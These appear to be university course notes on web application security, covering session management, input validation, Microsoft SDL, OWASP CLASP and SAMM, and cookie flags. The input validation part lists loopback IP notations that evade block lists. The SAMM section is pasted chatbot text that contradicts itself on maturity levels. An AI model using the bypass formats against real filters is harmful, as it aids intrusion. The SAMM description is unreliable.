HTTPS, reducing the risk of downgrade attacks.

- **OCSP Stapling:** Optionally, use Online Certificate Status Protocol (OCSP)


stapling to reduce the latency in certificate status verification.

TLS is a critical component of web application security, providing a secure foundation for the
transmission of sensitive data. As cyber threats evolve, it's essential to stay informed about the
latest TLS versions, vulnerabilities, and best practices to ensure the continued security of web
applications.
Session Management-Input Validation
**Session Management in Web Application Security:**

Session management is a crucial aspect of web application security that involves the
creation, maintenance, and termination of user sessions. A session is a period of interaction
between a user and a web application, typically starting when a user logs in and ending when
they log out or their session becomes inactive. Proper session management is essential for
protecting user data and preventing unauthorized access. Key considerations include:

DEPARTMENT OF AI&DS Page 30


1. **Session ID Security:**
- Use secure methods for generating and transmitting session IDs, ensuring they cannot
be easily guessed or intercepted.

- Implement secure random number generators for creating session IDs.


- Avoid exposing session IDs in URLs, as they can be more easily
compromised.

2. **Session Timeout:**
- Define reasonable session timeout values to automatically log out users after a period of
inactivity.

- Notify users before sessions expire to allow them to extend their session if needed.

3. **Session Fixation:**
- Implement measures to prevent session fixation attacks where an attacker sets a user's
session ID to a known value.

- Generate a new session ID upon login or after certain privileged operations.

4. **Secure Cookie Attributes:**


- Set secure attributes for session cookies, such as the 'Secure' attribute to ensure they
are transmitted only over secure (HTTPS) connections.

- Use the 'HttpOnly' attribute to prevent client-side script access to cookies.

5. **Logout Functionality:**
- Provide a secure logout mechanism that effectively terminates a user's session.
- Invalidate session data on the server side upon logout.

6. **Session Revocation:**

DEPARTMENT OF AI&DS Page 31


- Enable administrators to revoke sessions in the case of suspicious activity or a
compromised account.

- Implement mechanisms to force a re-authentication after certain sensitive operations.

7. **Session Data Protection:**


- Avoid storing sensitive information in session variables whenever possible.
- Encrypt session data if it needs to be stored on the server.

8. **Cross-Site Request Forgery (CSRF) Protection:**


- Implement anti-CSRF tokens to protect against CSRF attacks, where an attacker
forces a user to perform unintended actions without their consent.

9. **IP Address Checking:**


- Optionally, consider associating sessions with specific IP addresses to prevent
session hijacking.

**Input Validation in Web Application Security:**

Input validation is a critical component of web application security that involves checking
user inputs for correctness, security, and adherence to predefined criteria. Proper input
validation helps prevent a range of vulnerabilities, including injection attacks and cross-site
scripting. Key considerations include:

1. **Data Type Validation:**


- Ensure that input conforms to the expected data type (e.g., numbers, dates) to prevent
unexpected behavior or security issues.

2. **Length and Size Checks:**

DEPARTMENT OF AI&DS Page 32


- Validate that input lengths are within acceptable ranges to prevent buffer overflows
and other related vulnerabilities.

3. **Whitelisting Input:**
- Define and enforce a whitelist of allowed characters, rejecting input that includes
disallowed or special characters.

- Avoid using blacklists, as they can be less effective and prone to evasion.

4. **Regular Expressions:**
- Use regular expressions to define and enforce patterns for valid input.
- Be cautious with complex regular expressions to avoid security issues like denial-of-
service (DoS) attacks.

5. **HTML Entity Encoding:**


- Encode user input to prevent cross-site scripting (XSS) attacks. Convert special
characters to their HTML entity equivalents.

6. **Parameterized Queries:**
- When dealing with databases, use parameterized queries or prepared statements
to prevent SQL injection attacks.

7. **File Upload Validation:**


- If your application allows file uploads, implement strict validation on file types, size,
and content to prevent malicious file uploads.

8. **Client-Side Validation:**
- Implement client-side validation for a smoother user experience, but always validate
inputs on the server side as well to ensure security.

- Do not rely solely on client-side validation for security.

DEPARTMENT OF AI&DS Page 33


9. **Error Handling:**
- Customize error messages to avoid revealing too much information about the system or
underlying infrastructure.

- Provide generic error messages to users and log detailed errors for
administrators.

10. **Security Headers:**


- Use security headers, such as Content Security Policy (CSP), to mitigate the risk of
certain types of injection attacks.

By prioritizing effective session management and input validation, web applications can
significantly reduce the risk of common security vulnerabilities and provide a more secure
experience for users. Regularly updating and patching software components, staying
informed about emerging threats, and conducting thorough security testing are also essential
practices in maintaining robust web application security.
Input Validation
Overview
This page contains recommendations for the implementation of input validation.

Do not use input validation as the primary method of preventing Cross-Site Scripting, SQL
injection and other attacks which are covered by the Vulnerability Mitigation section.
Nevertheless, input validation can make a significant contribution to reducing the impact of
these attacks if implemented properly.

General
Perform input validation for data from all potentially untrusted sources, including suppliers,
partners, vendors, regulators, internal components or applications.

 Perform input validation for all user-controlled data, see Data source for
validation .
 Perform input validation as early as possible in a data flow, preferably as soon as
data is received from an external party before it is processed by an application.
 Implement input validation on the server side. Do not rely solely on validation
on the client side.

DEPARTMENT OF AI&DS Page 34


 Implement centralized input validation functionality.

Clarification

 Implement the following validation scheme:


o Normalize processed data, see Normalization .
o Perform a syntactic validation of the processed data, see Syntactic
validation .
o Perform a semantic validation of the processed data, see Semantic
validation .
 Implement protection against mass parameter assignment attacks.
 Log errors in the input validation, see the Logging and Monitoring page.
 Comply with requirements from the Error and Exception Handling page.

Normaliza琀椀on

 Ensure all the processed data is encoded in an expected encoding (for instance,
UTF- 8) and no invalid characters are present.
 Use NFKC canonical encoding form to treat canonically equivalent symbols.
 Define a list of allowed Unicode characters for data input and reject input with
characters outside the allowed character list. For example, avoid Cf (Format) Unicode
characters, commonly used to bypass validation or sanitization.

Clari昀椀ca琀椀on

Unicode classi昀椀es characters within di昀昀erent categories. Unicode characters have mul琀椀ple
uses, and their category is determined based on the primary characteris琀椀c of the character. There
are printable characters such as:

 Lu uppercase letters.
 Mn nonspacing marks, for example, accents and other letter decorations.
 Nd decimal numbers.
 Po other punctuation, for example, the Full Stop dot ..
 Zs space separator.
 Sm math symbol, for example, < or =.

and not printable characters such as:

 CC control.
 Cf format.

The last two categories (not printable characters) are the most used for a琀琀acks trying to
bypass input valida琀椀on, and therefore they should be avoided if not needed. For more
informa琀椀on on categories, please see
h琀琀ps://www.unicode.org/reports/tr44/#General_Category_Values.
There are three approaches to handle not-allowed characters:

DEPARTMENT OF AI&DS Page 35


 Recommended (rigorous and safe): reject the input completely if it has any
character outside of allowed character lists.
 Not recommended (lenient but safe): replace not-allowed characters with the
Replacement Character U+FFFD.
 Not recommended (unsafe): remove not-allowed characters from input. This
approach could have unexpected behaviors and be used by attackers to bypass
subsequent validation. Therefore, this approach should never be used.

Example of an allowed character list:

 L (Letter, contains Lu | Ll | Lt | Lm | Lo categories)


 N (Number, contains Nd | Nl | No categories)
 P (Punctuation, contains Pc | Pd | Ps | Pe | Pi | Pf | Po categories)
 S (Symbol, contains Sm | Sc | Sk | So categories)
 Z (Separator, contains Zs | Zl | Zp categories)

Syntac琀椀c valida琀椀on
Use data type validators built into the used web framework.

 Validate against JSON Schema and XML Schema (XSD) for input in these formats.
 Validate input against expected data type, such as integer, string, date, etc.
 Validate input against expected value range for numerical parameters and dates. If the
business logic does not define a value range, consider value range imposed by
language or database.
 Validate input against minimum and/or maximum length for strings.

Seman琀椀c valida琀椀on
De昀椀ne an allow list and validate all data against this list. Avoid using block list
valida琀椀on.
Clari昀椀ca琀椀on
There are two main valida琀椀on approaches:

 Allow list validation verifies that data complies with a known list of allowed values,
anything else is considered as invalid data.
 Block list validation verifies that data does not match any known blocked values. If
so, the data is considered invalid, anything else is considered valid data. Note that if a
block list validation is used, input data must be normalized before any comparison,
validation or processing. If normalization is not done properly, block list validation
can be easily bypassed.

Unfortunately, block list valida琀椀on may miss unknown bad values that an a琀琀acker could
leverage to bypass the valida琀椀on. For example, if an applica琀椀on handles IP addresses, an
a琀琀acker can bypass a block list that contains 127.0.0.1using rare IP formats:
127.1
0x7f.0x0.0x0.0x1
0x7f001

DEPARTMENT OF AI&DS Page 36


...

 Define an array of allowed values as a small set of string parameters (e.g. days of a
week).
 Define a list of allowed characters such as decimal digits or letters.
 You can use regular expressions to define allowed values, see the Regular
Expressions page.
 Implement file validation according to the File Upload page.
 Implement email validation according to the Authentication: Email Address
Confirmation page.

Session Management
Overview
This page contains recommendations for the implementation of session management. There

are two approaches to session management: Stateful and Stateless.

 In the case of the Stateful approach, a session token is generated on the server
side, saved to a database and passed to a client. The client uses this token to make
requests to the server side. Therefore, the server-side stores the following bundle:
account_id:session_id.
 In the case of the Stateless approach, a session token is generated on the server side
(or by a third-party service), signed using a private key (or secret key) and passed to
a client. The client uses this token to make requests to the server side. Therefore, the
server side needs to store a public key (or secret
key) to validate the signature.

General
Use the basecookie format to store session IDs, see the Cookie page.
Security

 Do not store any sensitive data (tokens, credentials, PII, etc.) in a session ID.
 Use the session management built into the framework you are using instead of
implementing a homemade one from scratch.
 Use up-to-date and well-known frameworks and libraries that implement
session management.
 Review and change the default configuration of the framework or library you are
using to enhance its security.
 Consider session IDs as untrusted data, as any other user input.
 Implement an idle or inactivity timeout for every session.

Clarification

DEPARTMENT OF AI&DS Page 37


 Implement a mechanism to allow users to actively close a session (logout) after
they have finished using an application.
 Invalidate the session at least on the server side while closing a session.
 Use different session IDs and token names for pre- and post-authentication flows.

Clarification

 Do not cache session IDs if caching application contents is allowed, see the
Transport Layer Protection page.

Clarification

 Do not pass a session ID in an URL (path, query or fragment).


 Renew or regenerate a session ID after any privilege level change within the
associated user session (anonymous -> regular user, regular user -> admin user, etc.).

Clarification

 Handle and store session IDs according to the Session Management page.
 Log successful and unsuccessful events related to a session lifecycle (such as
creation, regeneration, revoke) including attempts to access resources with
invalid session IDs, see the Logging and Monitoring page.

Use the ultimatecookie format to store session IDs, see the Cookie Security page.

 If a framework is used, change the default session ID name to something


neutral, for example, sessionid or id.
 Implement an absolute timeout for every session regardless of session activity.

Clarification

 Provide users with the ability to manage active sessions (view and close active
sessions).

Stateful approach related


Generate a session ID using a cryptographically strong generator, see the Cryptography:
Random Generators page.

 Use session IDs of length 16+ bytes.

DEPARTMENT OF AI&DS Page 38


 Do not accept a session ID that has never been generated by an application. In case
of receiving one, generate a new one for anonymous access and set it to a user.

Stateless approach related


Use JSON Web Tokens (JWT) to implement stateless session management, see
the JSON Web Token (JWT) page.

 Use the exp claim to implement a session timeout.


 Use the following algorithm to implement the logout functionality:
o Store the jti claim (unique token identifier) for each issued token.
o If a user logged out from an application, move the jti to a list of
blocked tokens.
o Remove a token from the block list when a token expires (check the exp
claim to determine if a token has expired)

DEPARTMENT OF AI&DS Page 39


UNIT II SECURE DEVELOPMENT AND
DEPLOYMENT
Web Applications Security:
Securing web applications is a critical aspect of software development and deployment. The
goal is to protect the application and its users from various security threats and vulnerabilities.
Here are key practices for secure development and deployment of web applications:

Secure Development Practices:

1. Input Validation:
 Validate and sanitize all user inputs to prevent injection attacks (e.g., SQL
injection, cross-site scripting).
 Use parameterized queries to prevent SQL injection.

2. Authentication and Authorization:


 Implement strong authentication mechanisms, including multi-factor
authentication when possible.
 Follow the principle of least privilege for user permissions.
 Regularly review and update access controls.

3. Session Management:
 Use secure and random session IDs.
 Implement session timeout and reauthentication for sensitive actions.
 Store session data securely, preferably on the server side.
4. Cross-Site Request Forgery (CSRF) Protection:
 Include anti-CSRF tokens in forms.
 Ensure that state-changing requests require proper authentication.
5. Cross-Origin Resource Sharing (CORS):
 Implement proper CORS policies to control which domains can access
resources.
 Avoid overly permissive CORS configurations.

6. Security Headers:
 Utilize security headers like Content Security Policy (CSP), Strict-
Transport-Security (HSTS), and X-Content-Type-Options.
7. File Upload Security:
 Validate file types and enforce size limits.
 Store uploaded files in a secure location outside the web root.
8. Error Handling:
 Provide custom error pages to avoid leaking sensitive information.
 Log errors securely without exposing sensitive data.
9. Code Reviews and Static Analysis:

DEPARTMENT OF AI&DS Page 1


 Regularly conduct code reviews to identify security vulnerabilities.
 Use static analysis tools to scan code for potential security issues.
10. Dependency Management:
 Keep all dependencies up-to-date to patch known vulnerabilities.
 Use a secure package manager and regularly audit dependencies.

Secure Deployment Practices:

1. Web Application Firewall (WAF):


 Deploy a WAF to filter and monitor HTTP traffic between a web
application and the Internet.
 Configure the WAF to protect against common web application attacks.

2. HTTPS:
 Enforce the use of HTTPS to encrypt data in transit.
 Use strong, up-to-date encryption protocols and ciphers.
3. Secure Configuration:
 Disable unnecessary services and features.
 Follow security best practices for server and database configurations.
4. Continuous Monitoring:
 Implement monitoring solutions to detect and respond to security
incidents.
 Regularly review logs for suspicious activities.

5. Incident Response Plan:


 Develop and document an incident response plan.
 Test the plan regularly to ensure a swift and effective response.
6. Data Backups:
 Regularly backup data and ensure the backups are secure.
 Test data restoration procedures to guarantee recoverability.
7. Environment Isolation:
 Isolate production, development, and testing environments.
 Limit access to production systems to only authorized personnel.
8. Regular Security Audits:
 Conduct regular security audits and penetration testing.
 Address and remediate any vulnerabilities discovered during audits.
9. Security Training:
 Provide security awareness training for development and operations teams.
 Keep teams informed about the latest security threats and best
practices.

10. Compliance:
 Ensure compliance with relevant security standards and regulations (e.g.,
GDPR, HIPAA).

DEPARTMENT OF AI&DS Page 2


By incorporating these practices into the development and deployment processes, you can
significantly enhance the security posture of your web applications.
Regularly updating and adapting security measures to address emerging threats is also
crucial for ongoing protection.

Security Testing, Security Incident Response Planning


Security testing and incident response planning are essential components of a
comprehensive cybersecurity strategy. Here's an overview of each:

Security Testing:

1. Penetration Testing:
 Purpose: To identify vulnerabilities and weaknesses in the application or
network.
 Ethical hackers simulate real-world attacks to uncover security
Method:
issues.
 Frequency:
Conduct regular penetration tests, especially after major
updates or changes.
2. Vulnerability Scanning:
 Purpose: Automated tools scan systems for known vulnerabilities.
 Method: Regularly scan networks, applications, and systems for known
security issues.
 Frequency: Implement continuous scanning to detect and address
vulnerabilities promptly.
3. Code Review:
 Purpose: Identifying security vulnerabilities in the source code.
 Method: Manual or automated review of the application's source code.
 Frequency: Regularly integrate code reviews into the development
process.
4. Security Audits:
 Purpose: Comprehensive review of security policies, configurations, and
practices.
 Method: Evaluate all aspects of security, including physical security,
policies, and procedures.
 Conduct periodic security audits to ensure ongoing
Frequency:
compliance and effectiveness.
5. Security Automation:
 Purpose: Automating security tests and checks.
 Method: Use tools for automated security testing, such as static analysis
tools, dynamic analysis tools, and security scanning tools.

DEPARTMENT OF AI&DS Page 3



Frequency: Integrate automation into the development and testing
pipeline.
6. Compliance Testing:
 Ensure compliance with relevant security standards and
Purpose:
regulations.
 Evaluate the system against specific compliance
Method:
requirements.
 Regularly assess and update compliance measures.
Frequency:

Security Incident Response Planning:

1. Incident Response Team:


 Formation: Establish a dedicated incident response team.
 Roles: Define roles and responsibilities for team members.
 Training: Ensure the team is trained and regularly updated on incident
response procedures.
2. Incident Identification:
 Detection Systems: Implement systems to detect and alert on security
incidents.
 Continuously monitor logs and network traffic for
Monitoring:
anomalies.
 User Reporting: Encourage users to report suspicious activities
promptly.
3. Incident Classification and Triage:
 Classification: Define incident severity levels.
 Triage: Develop a process for quickly assessing and categorizing
incidents.
4. Incident Containment:
 Isolation: Quickly isolate affected systems to prevent further damage.
 Communication: Establish clear communication channels within the
response team and with relevant stakeholders.
5. Eradication and Recovery:
 Root Cause Analysis: Identify and eliminate the root cause of the
incident.
 System Restoration: Restore affected systems from clean backups.
 Validation: Verify that the systems are free from compromise.
6. Communication and Notification:
 Internal Communication: Keep the internal team and relevant
stakeholders informed.
 External Communication: Develop a communication plan for
notifying external parties, such as customers, regulatory bodies, and law
enforcement if necessary.

DEPARTMENT OF AI&DS Page 4


7. Post-Incident Analysis:
 Debriefing: Conduct a thorough post-incident analysis.
 Documentation: Document lessons learned and update incident
response plans accordingly.
 Use the insights gained to enhance
Continuous
incident Improvement:
response capabilities.

8. Legal
 and Regulatory Compliance:
Comply with legal and regulatory requirements for
Reporting:
reporting incidents.
 Maintain documentation to demonstrate compliance
efforts.
Documentation:
 Conduct simulated incident response drills.
9. Training

and Exercises: Ensure ongoing training for the incident response
Regular Drills:
team and relevant staff.
Training Programs:
 Keep detailed logs of incident response activities.

10. Documentation and Record-Keeping:
Produce a comprehensive post-incident report for
internal and external review.
Incident Logs:
Post-Incident Report:

By implementing a robust security testing program and having a well-defined incident


response plan, organizations can proactively identify and mitigate security risks, respond
effectively to incidents, and continuously improve their overall security posture. Regular
testing, training, and updates to incident response plans are crucial to staying ahead of
evolving cybersecurity threats.

The Microsoft Security Development Lifecycle (SDL)


Microsoft Security Development Lifecycle (SDL)
 Article
 03/03/2023
 2 contributors
Feedback
In this article
1. Training
2. Requirements
3. Design
4. Implementation
Show 3 more

Security and privacy should never be an afterthought when developing secure software, a
formal process must be in place to ensure they're considered at all points of the product's
lifecycle. Microsoft's Security Development Lifecycle (SDL) embeds

DEPARTMENT OF AI&DS Page 5


comprehensive security requirements, technology specific tooling, and mandatory processes
into the development and operation of all software products. All development teams at
Microsoft must adhere to the SDL processes and requirements, resulting in more secure
software with fewer and less severe vulnerabilities at a reduced development cost.

Microsoft SDL consists of seven components including five core phases and two supporting
security activities. The five core phases are requirements, design, implementation,
verification, and release. Each of these phases contains mandatory checks and approvals to
ensure all security and privacy requirements and best practices are properly addressed. The
two supporting security activities, training and response, are conducted before and after the
core phases respectively to ensure they're properly implemented, and software remains
secure after deployment.

Training

All Microsoft employees are required to complete general security awareness training and
specific training appropriate to their role. Initial security awareness training is provided to
new employees upon hire and annual refresher training is required throughout their
employment at Microsoft.

Developers and engineers must also participate in role specific training to keep them
informed on security basics and recent trends in secure development. All full-time
employees, interns, contingent staff, subcontractors, and third parties are also encouraged
and provided with the opportunity to seek advanced security and privacy training.

DEPARTMENT OF AI&DS Page 6


Requirements

Every product, service, and feature Microsoft develops starts with clearly defined security and
privacy requirements; they're the foundation of secure applications and inform their design.
Development teams define these requirements based on factors such as the type of data the
product will handle, known threats, best practices, regulations and industry requirements, and
lessons learned from previous incidents. Once defined, the requirements are clearly defined,
documented, and tracked.

Software development is a continuous process, meaning that the associated security and
privacy requirements change throughout the product's lifecycle to reflect changes in
functionality and the threat landscape.

Design

Once the security, privacy, and functional requirements have been defined, the design of the
software can begin. As a part of the design process, threat models are created to help
identify, categorize, and rate potential threats according to risk.
Threat models must be maintained and updated throughout the lifecycle of each product as
changes are made to the software.

DEPARTMENT OF AI&DS Page 7


The threat modeling process begins by defining the different components of a product and
how they interact with each other in key functional scenarios, such as authentication. Data
Flow Diagrams (DFDs) are created to visually represent key data flow interactions, data
types, ports, and protocols used. DFDs are used to identify and prioritize threats for
mitigation that are added to the product's security requirements.

Developers are required to use Microsoft's Threat Modeling Tool for all threat models,
which enables the team to:

 Communicate about the security design of their systems


 Analyze security designs for potential security issues using a proven
methodology
 Suggest and manage mitigation for security issues

Before any product is released, all threat models are reviewed for accuracy and completeness,
including mitigation for unacceptable risks.

DEPARTMENT OF AI&DS Page 8


Implementation

Implementation begins with developers writing code according to the plan they created in
the previous two phases. Microsoft provides developers with a suite of secure development
tools to effectively implement all the security, privacy, and function requirements of the
software they design. These tools include compilers, secure development environments, and
built-in security checks.

Verification

Before any written code can be released, several checks and approvals are required to verify
that the code conforms to SDL, meets design requirements, and is free of coding errors.
SDL requires that manual reviews are conducted by a reviewer separate from the personnel
the developed the code. Separation of duties is an important control in this step to ensure no
code can be written and released by the same person leading to potential accidental or
malicious harm.

Various automated checks are also required and are built into the commit pipeline to analyze
code during check-in and when builds are compiled. The security checks used at Microsoft
fall into the following categories:

 Static code analysis: Analyzes source code for potential security flaws,
including the presence of credentials in code.
 Binary analysis: Assesses vulnerabilities at the binary code level to confirm
code is production ready.
 Credential and secret scanner: Identify possible instances of credential and
secret exposure in source code and configuration files.
 Encryption scanning: Validates encryption best practices in source code and
code execution.
 Fuzz testing: Use malformed and unexpected data to exercise APIs and parsers
to check for vulnerabilities and validate error handling.
 Configuration validation: Analyzes the configuration of production systems
against security standards and best practices.
 Component Governance (CG): Open-source software detection and checking
of version, vulnerability, and legal obligations.

If the manual reviewer or automated tools find any issues in the code, the submitter will be
notified, and they're required to make the necessary changes before submitting it for review
again.

Additionally, penetration tests are regularly conducted on Microsoft online services by both
internal and external providers. Penetration tests provide another means for discovering
security flaws not detected by other methods. To learn more about penetration testing at
Microsoft, see Attack simulation in Microsoft 365.

DEPARTMENT OF AI&DS Page 9


Release

After passing all required security tests and reviews, builds aren't immediately released to
all customers. Builds are systematically and gradually released to larger and larger groups,
referred to as rings, in what is called a safe deployment process (SDP). The SDP rings are
defined as follows:

 Ring 0: The development team responsible for the service


 Ring 1: All Microsoft employees
 Ring 2: Users outside of Microsoft who have configured their organization or
specific users to be on the targeted release channel
 Ring 3: Worldwide standard release in sub-phases

Builds remain in each of these rings for an appropriate number of days with high load
periods, except for Ring 3 since the build has been appropriately tested for stability in the
earlier rings.

OWASP Comprehensive Lightweight Application Security Process (CLASP)


Concepts View
CLASP — Comprehensive, Lightweight Application Security Process — is an activitydriven,
role-based set of process components whose core contains formalized best practices for building
security into your existing or new-start software development lifecycles in a structured, repeatable,
and measurable way.
CLASP is the outgrowth of years of extensive field work in which system resources of many
development lifecycles were methodically decomposed in order to create a comprehensive
set of security requirements. These resulting requirements form the basis of CLASP’s best
practices which allow organizations to systematically address vulnerabilities that, if exploited, can
result in the failure of basic security services — e.g., confidentiality, authentication, and access
control.

• Adaptability of CLASP to Existing Development Processes


CLASP is designed to allow you to easily integrate its security-related activities into your
existing application development processes. Each

DEPARTMENT OF AI&DS Page 10


CLASP activity is divided into discrete process components and linked to one or more specific
project roles. In this way, CLASP provides guidance to project participants — e.g., project
managers, security auditors, developers, architects, testers, and others — that is easy to adopt
to their way of working; this results in incremental improvements to security that are easily
achievable, repeatable, and measurable.

• CLASP Vulnerability Lexicon


CLASP also contains a comprehensive Vulnerability Lexicon that helps development teams
avoid/remediate specific designing/coding errors that can lead to exploitable security services.
The basis of this Lexicon is a highly flexible taxonomy — i.e., classification structure — that enables
development teams to quickly locate Lexicon
information from many perspectives: e.g., problem types (i.e., basic causes of vulnerabilities);
categories of problem types; exposure periods; avoidance and mitigation periods; consequences
of exploited vulnerabilities; affected platforms and programming languages; risk assessment.

• Automated Analysis Tools


Much of the information in the CLASP Vulnerability Lexicon can be enforced through use of
automated tools using techniques of static analysis of source code.
Overview of CLASP Process
This section provides an overview of CLASP’s structure and of the dependencies between the
CLASP process components and is organized as follows:

• CLASP Views
• CLASP Resources
• Vulnerability Use Cases

DEPARTMENT OF AI&DS Page 11


CLASP Views
The CLASP process is presented through five high-level perspectives called CLASP Views. These
views are broken down into activities which in turn contain process components. This top-down
organization by View > Activity > Process Component allows you to quickly understand the
CLASP process, how CLASP pieces interact, and how to apply them to your specific software
development lifecycle.
These are the CLASP Views:

• Concepts View
• Role-Based View
• Activity-Assessment View
• Activity-Implementation View
• Vulnerability View
The following figure shows the CLASP Views and their interactions: CLASP Resources
The CLASP process supports planning, implementing and performing security-related software
development activities. The CLASP Resources provide access to artifacts that are especially useful if
your project is using tools to help automate CLASP process pieces
. This table lists the name and location of CLASP Resources delivered with CLASP and indicates
which CLASP Views they can support:
CLASP Resources Location

• Basic Principles in Application Security (all Views) Resource A


• Example of Basic Principle: Input Validation (all Views) Resource B
• Example of Basic-Principle Violation: Penetrate-and-Patch Model (all Views) Resource C

DEPARTMENT OF AI&DS Page 12


• Core Security Services (all Views; especially III) Resource D
• Sample Coding Guideline Worksheets (Views II, III & IV) Note: Each worksheet can be
pasted into a MS Word document. Resource E

• System Assessment Worksheets (Views III & IV) Note: Each worksheet can be pasted into
a MS Word document. Resource F • Sample Road Map: Legacy Projects (View III) Resource
G1 • Sample Road Map: New-Start Projects (View III) Resource G2 • Creating the Process
Engineering Plan (View III) Resource H • Forming the Process Engineering Team (View III)
Resource I • Glossary of Security Terms (all Views) Resource J Version Date: 31 March 2006
5 CLASP Concepts View — Overview of CLASP Process
Vulnerability Use Cases
The CLASP Vulnerability Use Cases depict conditions under which security services can
become vulnerable in software applications. The Use Cases provide CLASP users with easy-to-
understand, specific examples of the cause-and-effect relationship between security- unaware
design/source coding and possible resulting vulnerabilities in basic security services — e.g.,
authentication authorization, confidentiality, availability, accountability, and non-repudiation.
The CLASP Vulnerability Use Cases are based on the following common component
architectures:

• Monolithic UNIX
• Monolithic mainframe
• Distributed architecture (HTTP[S] & TCP/IP)
It is recommended to understand the CLASP Use Cases as a bridge from the Concepts View
of CLASP to the Vulnerability Lexicon (in the Vulnerability View) since they provide specific
examples of security services becoming vulnerable in software applications
CLASP Best Practices

DEPARTMENT OF AI&DS Page 13


If security vulnerabilities built into your applications’ source code survive into production, they
can become corporate liabilities with broad and severe business impact on your organization. In
view of the consequences of exploited security vulnerabilities, there is no reasonable alternative
to using best practices of application security as early as possible in — and throughout — your
software development lifecycle.

The So昀琀ware Assurance Maturity Model (SAMM)

Software Assurance Maturity Model

Our mission is to provide an effective and measurable way for you to analyze and improve
your secure development lifecycle. SAMM supports the complete software lifecycle and is
technology and process agnostic. We built SAMM to
be evolutive and risk-driven in nature, as there is no single recipe that works for all
organizations.

DEPARTMENT OF AI&DS Page 14


Check out the OWASP SAMM v2 model online:

Get OWASP SAMM new delivered to your mailbox

 Subscribe to our newsletter

Join us on the OWASP SAMM project Slack channel

 Join our project slack channel


 Invitations (self registration) via: https://owasp.org/slack/invite

Join our monthly calls

 The monthly call is on each 2nd Wednesday of the month at 21h30 CET / 3:30pm
ET.
 Register through our SAMM MeetUp to join the Zoom call.
 The call is open for everybody interested in SAMM or who wants to work on
SAMM.

The Software Assurance Maturity Model (SAMM) is an open framework to help


organizations formulate and implement a strategy for software security that is tailored to the
specific risks facing the organization. SAMM helps you:

 Evaluate an organization’s existing software security practices


 Build a balanced software security assurance program in well-defined iterations
 Demonstrate concrete improvements to a security assurance program
 Define and measure security-related activities throughout an
organization

DEPARTMENT OF AI&DS Page 15


Dell uses OWASP’s Software Assurance Maturity Model (Owasp SAMM) to help focus our
resources and determine which components of our secure application development program to
prioritize., (Michael J. Craigue, Information Security & Compliance, Dell, Inc.)

As of my last knowledge update in January 2022, the Software Assurance Maturity Model
(SAMM) is an open framework maintained by the Open Web Application Security Project
(OWASP). SAMM provides an effective and measurable way for all types of organizations
to analyze and improve their software security posture.

Key Components of SAMM:

1. Governance:
Objective: Establish and maintain the appropriate level of software security
governance.
 Activities: Define and implement policies, roles, responsibilities, and
processes to support software security.
2. Construction :
 Objective: Ensure that security activities are integrated into the software
development process.
 Activities: Apply security practices during the development phase,
including requirements, design, coding, and testing.
3. Verification:
 Objective: Implement security practices to confirm that software is secure and
meets requirements.
 Activities: Conduct security testing, code review, and use automated tools
to verify the security of the software.
4. Deployment:
 Objective: Develop and implement strategies to deploy software securely.
 Activities: Ensure secure configuration, perform secure deployment, and
monitor
security during deployment.
5. Operations:
 Objective: Manage and respond to software security issues in deployed
 Activities: software.
Establish incident response and management processes, conduct
regular security operations, and monitor for security incidents.
6. Continuous Improvement:
 Objective: Continuously improve the software security process.
 Activities: Collect and analyze metrics, conduct retrospectives, and refine
security
practices based on lessons learned.

SAMM Levels:

SAMM defines three maturity levels for each of the six domains mentioned above:

1. Level 1 - Initial:
Description: The organization has started considering software security.

DEPARTMENT OF AI&DS Page 16


 Characteristics: Reactive, ad-hoc practices, and minimal security measures.
2. Level 2 - Defined:
 Description: Security activities are defined and documented.
 Characteristics: Basic processes in place, some level of consistency.
3. Level 3 - Consistent:
 Description: Security practices are consistently applied across the organization.
 Characteristics: Well-defined and consistent processes, proactive measures.
4. Level 4 - Managed:
 Description: The organization actively manages and measures its security
practices.
 Characteristics: Metrics-driven, continuous improvement, proactive security
measures.
5. Level 5 - Optimizing:
 Description: Continuous optimization and improvement of security practices.
 Characteristics: Continuous feedback loops, adaptive and innovative security
measures.

SAMM Implementation:

Organizations can use SAMM to assess their current state and define a roadmap for
improving their software security practices. The model provides guidance on activities and
practices at each maturity level, allowing organizations to incrementally enhance their
software security posture.
Benefits:

 Measurable Improvement: SAMM allows organizations to measure their maturity and


progress in software security over time.
 Customizable Approach: SAMM is flexible and can be adapted to suit the specific
needs and context of different organizations.
 Comprehensive Framework: SAMM covers various aspects of the software development
lifecycle, providing a holistic approach to software security.
 Community Support: Being an OWASP project, SAMM benefits from
community collaboration and contributions.

For the most recent and detailed information on SAMM, please check the OWASP website
or other authoritative sources. The field of software security evolves, and updates or changes
may have occurred since my last knowledge update.

DEPARTMENT OF AI&DS Page 17


UNIT III SECURE API DEVELOPMENT
API Security- Session Cookies

API security is a crucial aspect of web application security, and session cookies play a significant
role in securing user sessions. Here are some best practices and considerations for securing
session cookies in the context of API security:

1. Use Secure and HttpOnly Flags:


 Set the Secure flag to ensure that the cookie is only sent over secure
(HTTPS) connections, preventing it from being transmitted over
unencrypted channels.
 Set the NttpOnly flag to prevent client-side scripts from accessing the cookie. This
helps mitigate the risk of cross-site scripting (XSS) attacks.
httpCopy code
Set-Cookie: sessionid=abc123; Secure; HttpOnly

2. Implement SameSite Attribute:


 Set the SameSite attribute to control when cookies are sent with cross-site
requests. This helps mitigate the risk of cross-site request forgery (CSRF)
attacks.
 Use SameSite=Lax for a more lenient policy or SameSite=Strict for a stricter
policy.
httpCopy code
Set-Cookie: sessionid=abc123; Secure; HttpOnly; SameSite=Strict

3. Set a Reasonable Expiry Time:


 Define an appropriate expiration time for session cookies to limit the
exposure of session data. Shorter expiration times reduce the risk associated
with stolen or leaked cookies.
httpCopy code
Set-Cookie: sessionid=abc123; Secure; HttpOnly; SameSite=Strict; Max-Age=3600

4. Use Session Token Rotation:


 Implement session token rotation to invalidate and reissue session
tokens periodically. This practice makes it more difficult for attackers
to exploit a compromised session.
5. Implement Token Revocation:
 Provide a mechanism to revoke and invalidate session tokens in case of a
security incident or when a user logs out. This helps ensure that even if a
token is compromised, it can be rendered useless.
6. Secure Storage of Tokens:
 Ensure that session tokens are securely stored on the client side. Consider
using techniques like HTTP-only cookies and secure storage mechanisms
(e.g., sessionStorage) to prevent unauthorized access.
7. Logging and Monitoring:
 Implement robust logging and monitoring for your API to detect and respond
to any suspicious activities or potential security incidents related to session
cookies.
8. Regular Security Audits:
 Conduct regular security audits and code reviews to identify and

DEPARTMENT OF AI&DS Page 1


address potential vulnerabilities in the authentication and session
management mechanisms.

DEPARTMENT OF AI&DS Page 2


9. Stay Informed on Security Best Practices:
 Keep yourself informed about the latest security best practices and standards
